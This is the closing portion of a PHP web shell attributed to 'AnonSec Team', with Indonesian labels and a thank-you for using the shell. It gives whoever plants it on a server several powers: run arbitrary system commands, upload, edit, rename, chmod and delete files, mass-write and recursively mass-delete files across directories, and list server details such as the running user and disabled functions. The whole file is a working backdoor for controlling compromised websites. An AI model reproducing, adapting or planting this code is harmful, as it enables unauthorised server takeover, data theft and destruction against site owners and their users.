echo "</div>";
}
} else {
echo "<br />$▘
<form method='post'>
<b>Tipe:</b><br>
<div class='custom-control custom-switch'>
<input type='checkbox' id='customSwitch' class='custom-control-input' name='tipe' value='biasa'>
<label class='custom-control-label' for='customSwitch'>Biasa</label>
</div>
<div class='custom-control custom-switch'>
<input type='checkbox' id='customSwitch1' class='custom-control-input' name='tipe' value='massal'>
<label class='custom-control-label' for='customSwitch1'>Massal</label>
</div>
<b><i class='bi bi-folder'></i> Lokasi:</b>
<input class='form-control' type='text' name='d_dir' value='$dir' height='10'>
<b><i class='bi bi-file-earmark'></i> File name:</b>
<input class='form-control' type='text' name='d_file' placeholder='name file' height='10'>
<b><i class='bi bi-file-earmark'></i> Your script:</b>
<textarea class='form-control' rows='7' name='script' placeholder='your secript here'></textarea><br />
<input type='submit' name='start' value='Go' class='btn btn-outline-light'>
</form>";
}
}
elseif($_GET['id'] == 'info'){
$disfunc = @ini_get("disable_functions");
if (empty($disfunc)) {
$disfc = "<font color=green>NONE</font>";
} else {
$disfc = "<font color=red>$disfunc</font>";
}
if(!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=green>OFF</font>";
echo '<br />'.$▘.'
<div class="container">
<div class="card text-dark">
<div class="card-header">';
echo "<b>Uname: </b><font color=green>".php_uname()."</font><br />";
echo "<b>Software: </b><font color=green>".$_SERVER['SERVER_SOFTWARE']."</font><br />";
echo "<b>PHP version: </b><font color=green>".PHP_VERSION."</font> <b>PHP os:</b> <font color=green>".PHP_OS."</font><br />";
echo "<b>Server Ip: </b><font color=green>".gethostbyname($_SERVER['HTTP_HOST'])."</font><br />";
echo "<b>Your Ip: </b><font color=green>".ip()."</font><br />";
echo "<b>User: </b><font color=green>$user</font> ($uid) | <b>Group:</b> <font color=green>$group</font> ($gid)<br />";
echo "<b>Safe Mode: </b>$sm<br />";
echo "<kbd>Disable Function:</kbd><pre>$disfc</pre>";
echo '</div>
</div>
</div>';
}
elseif($_GET['id'] == 'about'){
echo '<br />'.$▘.'
<div class="container">
<div class="card text-dark">
<div class="card-header">';
echo "<img alt='AnonSec Team' class='img-thumbnail rounded mx-auto d-block' src='//unknownsec.ftp.sh/AnonSec.jpg' width='150px'>";
echo "<b>- About Me -</b><br />";
echo "Thanks bre dah pake shell nya, jika ada yang error silahkan hubungi email di bawah.<br />Greetz : <a href=''>{ AnonSec Team } - And You</a><br />My email: <a href='mailto:unknownsec1337@gmail.com'>unknownsec1337@gmail.com</a>";
echo '</div>
</div>
</div>';
}
elseif($_GET['id'] == 'cmd') {
echo "$▘<br>
<form method='POST'>
<div class='input-group mb-3'>
<input class='form-control' type='text' name='cmd' value='$cmd'>
<select class='bg-dark text-light form-control' name='execCMD'>
<option>$method</option>";
ob_start();
$methodArray = ekse();
ob_end_clean();
foreach ($methodArray as $value) {
echo "<option>$value</option>";
}
echo '</select>
</div>
</form>';
if($cmd == "") {
echo "
<div class='card text-dark'>
<div class='card-header'>
<pre>";
ekseCMD("whoami", $method);
echo '</pre>
</div>
</div>';
}else {
echo "
<div class='card text-dark'>
<div class='card-header'>
<pre><kbd>~$ ".$cmd."</kbd><br>";
ekseCMD($cmd, $method);
echo "</pre>
</div>
</div>";
}
}
elseif($_GET['id'] == 'upload'){
echo '<br />'.$▘.'
<form action="" method="post" enctype="multipart/form-data">
<div class="input-group mb-3 text-center">
<input type="file" class="form-control form-control-sm" name="file">
<button type="submit" class="btn btn-outline-light btn-sm">Submit</button>
</div>
</form>';
if(isset($_FILES['file'])){
if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success upload",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed upload",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
}
}
elseif($_GET['id'] == 'delete'){
function hapus_massal($dir,$namafile) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$▚ = $dirc.'/'.$namafile;
if($dirb === '.') {
if(file_exists("$dir/$namafile")) {
unlink("$dir/$namafile");
}
} elseif($dirb === '..') {
if(file_exists("".dirname($dir)."/$namafile")) {
unlink("".dirname($dir)."/$namafile");
}
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
if(file_exists($▚)) {
echo "[<font color=green>deleted</font>] $▚<br>";
unlink($▚);
$▟ = hapus_massal($dirc,$namafile);
}
}
}
}
}
}
}
if($_POST['start']) {
echo "<div style='margin: 5px auto; padding: 5px'>";
hapus_massal($_POST['d_dir'], $_POST['d_file']);
echo "</div>";
} else {
echo "<br />$▘
<form method='post'>
<b><i class='bi bi-folder'></i> Lokasi:</b>
<input class='form-control' type='text' name='d_dir' value='$dir' height='10'>
<b><i class='bi bi-file-earmark'></i> File name:</b>
<div class='input-group mb-3'>
<input class='form-control' type='text' name='d_file' placeholder='name file' height='10'><br>
<div class='input-group-append'>
<input class='btn btn-outline-light' type='submit' name='start' value='Go'>
</form>
</div>
</div>";
}
}
}
// akhir tools
if(isset($_GET['filesrc'])){
echo "<br><b>name : </b>".basename($_GET['filesrc']);"</br>";
echo '<textarea class="form-control" rows="7" readonly> '.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea><br />';
}
elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
echo '<br><b>name : </b>'.basename($_POST['path']);'</br>';
//Chmod
if($_POST['opt'] == 'chmod'){
if(isset($_POST['perm'])){
if(chmod($_POST['path'],$_POST['perm'])){
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success Change Permission",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed change permission",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
}
echo '<form method="POST">
<div class="input-group mb-3">
<input class="form-control" name="perm" type="text" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'"/>
<input class="form-control" type="hidden" name="path" value="'.$_POST['path'].'">
<input class="form-control" type="hidden" name="opt" value="chmod">
<div class="input-group-append">
<input class="btn btn-outline-light" type="submit" value="Go"/>
</form>
</div>
</div>';
}
//rename folder
elseif($_GET['opt'] == 'btw'){
$cwd = getcwd();
echo '<form action="?option&path='.$cwd.'&opt=delete&type=buat" method="POST">
<div class="input-group mb-3">
<input class="form-control" name="name" type="text" value="Folder"/>
<input class="form-control" type="hidden" name="path" value="'.$cwd.'">
<input class="form-control" type="hidden" name="opt" value="delete">
<div class="input-group-append">
<input class="btn btn-outline-light" type="submit" value="Go"/>
</form>
</div>
</div>';
}
//rename file
elseif($_POST['opt'] == 'rename'){
if(isset($_POST['newname'])){
if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success change name",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed change name",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
<div class="input-group mb-3">
<input class="form-control" name="newname" type="text" value="'.$_POST['name'].'" />
<input class="form-control" type="hidden" name="path" value="'.$_POST['path'].'">
<input class="form-control" type="hidden" name="opt" value="rename">
<div class="input-group-append">
<input class="btn btn-outline-light" type="submit" value="Go"/>
</form>
</div>
</div>';
}
//edit file
elseif($_POST['opt'] == 'edit'){
if(isset($_POST['src'])){
$fp = fopen($_POST['path'],'w');
if(fwrite($fp,$_POST['src'])){
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Edit file Success",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed edit file",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
fclose($fp);
}
echo '<form method="POST">
<textarea class="form-control" rows="7" name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
<input class="form-control" type="hidden" name="path" value="'.$_POST['path'].'">
<input class="form-control" type="hidden" name="opt" value="edit">
<input class="btn btn-outline-light" type="submit" value="Go"/>
</form><br />';
}
}else{
//delete dir
if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
if($_POST['type'] == 'dir'){
if(rmdir($_POST['path'])){
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success delete dir",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed delete dir",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
}
//delete file
elseif($_POST['type'] == 'file'){
if(unlink($_POST['path'])){
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success delete file",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed delete file",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
}
}
echo '</center>';
$scandir = scandir($path);
$pa = getcwd();
echo '<div class="table-responsive">
<table class="table table-hover table-dark text-light">
<thead>
<tr>
<td class="text-center">Name</td>
<td class="text-center">Last edit</td>
<td class="text-center">Size</td>
<td class="text-center">Permission</td>
<td class="text-center">Options</td>
</tr>
</thead>
<tbody class="text-nowrap">';
foreach($scandir as $dir){
$dt = date("Y-m-d", filemtime("$path/$dir"));
if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
echo "
<tr>
<td><i class='bi bi-folder-fill'></i><a class='text-decoration-none text-secondary' href=\"?path=$path/$dir\">$dir</a></td>
<td><center>$dt</center></td>
<td><center>DIR</center></td>
<td><center>";
if(is_writable("$path/$dir")) echo '<font color="green">';
elseif(!is_readable("$path/$dir")) echo '<font color="red">';
echo p("$path/$dir");
if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
echo "</center></td>
<td>
<form method=\"POST\" action=\"?option&path=$path\">
<div class='input-group mb-3 text-center'>
<select class=\"form-select form-select-sm\" name=\"opt\">
<option selected disabled>Select</option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"dir\">
<input type=\"hidden\" name=\"name\" value=\"$dir\">
<input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
<input class=\"btn btn-outline-light btn-sm\" type=\"submit\" value=\"Go\"/>
</form>
</div>
</td>
</tr>";
}
foreach($scandir as $file){
$ft = date("Y-m-d", filemtime("$path/$file"));
if(!is_file($path.'/'.$file)) continue;
$s = filesize($path.'/'.$file)/1024;
$s = round($s,3);
if($s >= 1024){
$s = round($s/1024,2).' MB';
}else{
$s = $s.' KB';
}
echo "
<tr>
<td><i class='bi bi-file-earmark-code-fill'></i><a class='text-decoration-none text-secondary' href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
<td><center>$ft</center></td>
<td><center>$s</center></td>
<td><center>";
if(is_writable("$path/$file")) echo '<font color="green">';
elseif(!is_readable("$path/$file")) echo '<font color="red">';
echo p("$path/$file");
if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
echo "</center></td>
<td>
<form method=\"POST\" action=\"?option&path=$path\">
<div class='input-group mb-3 text-center'>
<select class=\"form-select form-select-sm\"name=\"opt\">
<option selected disabled>Select</option>
<option value=\"delete\">Delete</option>
<option value=\"edit\">Edit</option>
<option value=\"rename\">Rename</option>
<option value=\"chmod\">Chmod</option>
<option value=\"download\">Download</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"file\">
<input type=\"hidden\" name=\"name\" value=\"$file\">
<input type=\"hidden\" name=\"path\" value=\"$path/$file\">
<input class=\"btn btn-outline-light btn-sm\" type=\"submit\" value=\"Go\"/>
</form>
</div>
</td>
</tr>";
}
}
echo "
</tbody>
</table>
<div class='text-center'>
<kbd>Copyright © ".date("Y")." - $▛</kbd>
</div>
</div>
</div>
</div>
</div>
<script src='//code.jquery.com/jquery-3.3.1.slim.min.js'></script>
<script src='//cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js'></script>
<script src='//stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js'></script>
</body>
</html>";
?>